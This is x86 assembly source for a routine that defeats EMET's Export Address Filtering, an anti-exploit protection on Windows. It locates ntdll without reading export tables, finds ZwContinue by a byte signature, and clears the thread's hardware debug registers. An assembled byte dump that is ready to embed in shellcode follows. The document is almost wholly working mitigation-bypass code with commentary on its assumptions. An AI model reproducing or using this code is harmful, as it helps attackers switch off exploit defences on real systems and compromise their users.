assume fs:nothing                                ; detach FS from any segment so the explicit fs:[...] overrides in GET_NT_BASE assemble (FS addresses the TEB at run time)
; GET_NT_BASE Reg32 — load the image base of ntdll.dll into Reg32 by walking
; TEB -> PEB -> PEB_LDR_DATA -> InLoadOrderModuleList. No export table is
; touched (no GetProcAddress / LoadLibrary), which matters for the EAF bypass
; below: reading an export table is exactly what EAF watches.
; Clobbers: Reg32 only; plain movs, so flags are unchanged.
; NOTE(review): assumes the 2nd load-order entry is ntdll.dll (entry 1 being the
; main image, as in a normally initialised process). The entry is NOT checked
; against BaseDllName, so an unusual load order yields a wrong module base.
%GET_NT_BASE macro Reg32
mov Reg32,fs:[TEB.Peb]                                            ; Reg32 = PEB
mov Reg32,PEB.Ldr[Reg32]                                          ; Reg32 = PEB_LDR_DATA
mov Reg32,PEB_LDR_DATA.InLoadOrderModuleList.Flink[Reg32]         ; 1st entry (expected: the main image)
mov Reg32,LDR_DATA_TABLE_ENTRY.InLoadOrderModuleList.Flink[Reg32] ; 2nd entry (expected: ntdll.dll)
mov Reg32,LDR_DATA_TABLE_ENTRY.DllBase[Reg32]; Reg32 = ntdll.dll image base (unverified, see note above)
endm
; BypassEAF — clear the current thread's hardware debug registers so that
; EAF (EMET's Export Address Filtering, which relies on debug-register
; breakpoints covering the export tables) stops firing.
; Nothing here reads an export table: ntdll's base comes from the loader list
; (GET_NT_BASE) and the address of ZwContinue is recovered from a byte
; signature in ntdll's code section, so the bypass does not trip EAF while it
; is being set up.
; Returns: eax = ntdll.dll image base on success,
;          eax = 0 if the signature was not found in ntdll's code section.
; Clobbers: eax, ecx, edx, flags. esi/edi are preserved via `uses`.
; Caveats (review):
;  - The 20-byte signature is tied to one build of the 32-bit ntdll (the tail of
;    a routine ending in push 0 / push ecx / call ZwContinue). On other builds the
;    scan reaches Error and 0 is returned; callers MUST check eax before
;    assuming EAF is off.
;  - Whether the kernel honours a user-supplied context requesting only
;    CONTEXT_DEBUG_REGISTERS is not checked here; it is assumed from the
;    platform this was written against.
;  - ZwContinue is assumed stdcall: no stack cleanup follows `Call Edx`.
BypassEAF proc uses esi edi
Local Context[300H]:BYTE                        ; CONTEXT buffer (x86 CONTEXT fits in 300h bytes); only its first 20h bytes are ever initialised
%GET_NT_BASE Eax                                ; eax = ntdll image base
mov edi,eax                                     ; edi = scan cursor (advanced to the code section below)
mov esi,eax                                     ; esi = ntdll base, kept for the return value
add eax,IMAGE_DOS_HEADER.e_lfanew[eax]          ; eax -> IMAGE_NT_HEADERS
add edi,IMAGE_NT_HEADERS.OptionalHeader.BaseOfCode[eax]  ; edi -> start of the code section
mov ecx,IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode[eax]  ; ecx = bytes left to scan
mov ax,51H; al = first signature byte (opcode of push ecx); the upper bits of eax are stale and unused from here on
sub ecx,20H                                     ; stop 20h bytes short of the section end so the compares below (reading up to [edi+19]) stay in-section; NOTE(review): no guard for SizeOfCode < 20h, which would wrap ecx and scan past the section
@@:
; Signature (offset 0 = the 51h that repne scasb matches):
; 51 53 xx xx xx xx xx 0A C0 74 xx 5B 59 6A 00 51 E8 xx xx xx xx
; push ecx / push ebx / call rel32 / or al,al / je short / pop ebx / pop ecx / push 0 / push ecx / call ZwContinue
; After repne scasb edi points just past the matched 51h, so the offsets below are relative to the 53h.
repne scasb                                     ; find the next 51h; ZF is clear if ecx runs out first
jne Error                                       ; no further candidate in range (with ecx already 0 the rep does nothing and the flags left by the previous instruction decide)
cmp byte ptr [edi],53H; push ebx
jne @b                                          ; not the pattern: keep scanning with the remaining ecx
cmp word ptr [edi + 6],0C00AH; or al,al
jne @b
cmp byte ptr [edi + 8],74H; je
jne @b
cmp dword ptr [edi + 10],006A595BH; pop ebx/pop ecx/push 0
jne @b
cmp word ptr [edi + 14],0E851H; push ecx/call ZwContinue
jne @b
mov edx,dword ptr [edi + 16]                    ; edx = rel32 operand of the call
xor eax,eax                                     ; eax = 0, used as the TestAlert argument
lea edx,[edx + edi + 20]                        ; edx = call target = address after the call (edi+20) + rel32 -> ZwContinue
push eax                                        ; arg 2: TestAlert = FALSE
lea edi,Context
mov ecx,8
push edi                                        ; arg 1: &Context (pushed before rep stosd advances edi)
rep stosd                                       ; zero the first 8 dwords: ContextFlags plus the Dr0-Dr3/Dr6/Dr7 slots of the x86 CONTEXT layout -> every hardware breakpoint disabled
mov dword ptr [Context],CONTEXT_DEBUG_REGISTERS; ContextFlags: request that only the debug-register part of the context be applied
Call Edx; ZwContinue(&Context, FALSE): loads the zeroed DR0-DR7 and, since no other context part is requested, resumes right after this call
mov eax,esi                                     ; success: return the ntdll base
Exit:
ret
Error:
xor eax,eax                                     ; signature not found: return 0
jmp Exit
BypassEAF endp
Dump (assembled bytes of BypassEAF, with GET_NT_BASE expanded inline):
55 8B EC 81 C4 00 FD FF FF 56 57 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 40 18 8B F8 8B F0
03 40 3C 03 78 2C 8B 48 1C 66 B8 51 00 83 E9 20 F2 AE 75 4E 80 3F 53 75 F7 66 81 7F 06 0A C0 75
EF 80 7F 08 74 75 E9 81 7F 0A 5B 59 6A 00 75 E0 66 81 7F 0E 51 E8 75 D8 8B 57 10 33 C0 8D 54 17
14 50 8D BD 00 FD FF FF B9 08 00 00 00 57 F3 AB C7 85 00 FD FF FF 10 00 01 00 FF D2 8B C6 5F 5E
C9 C3 33 C0 EB F8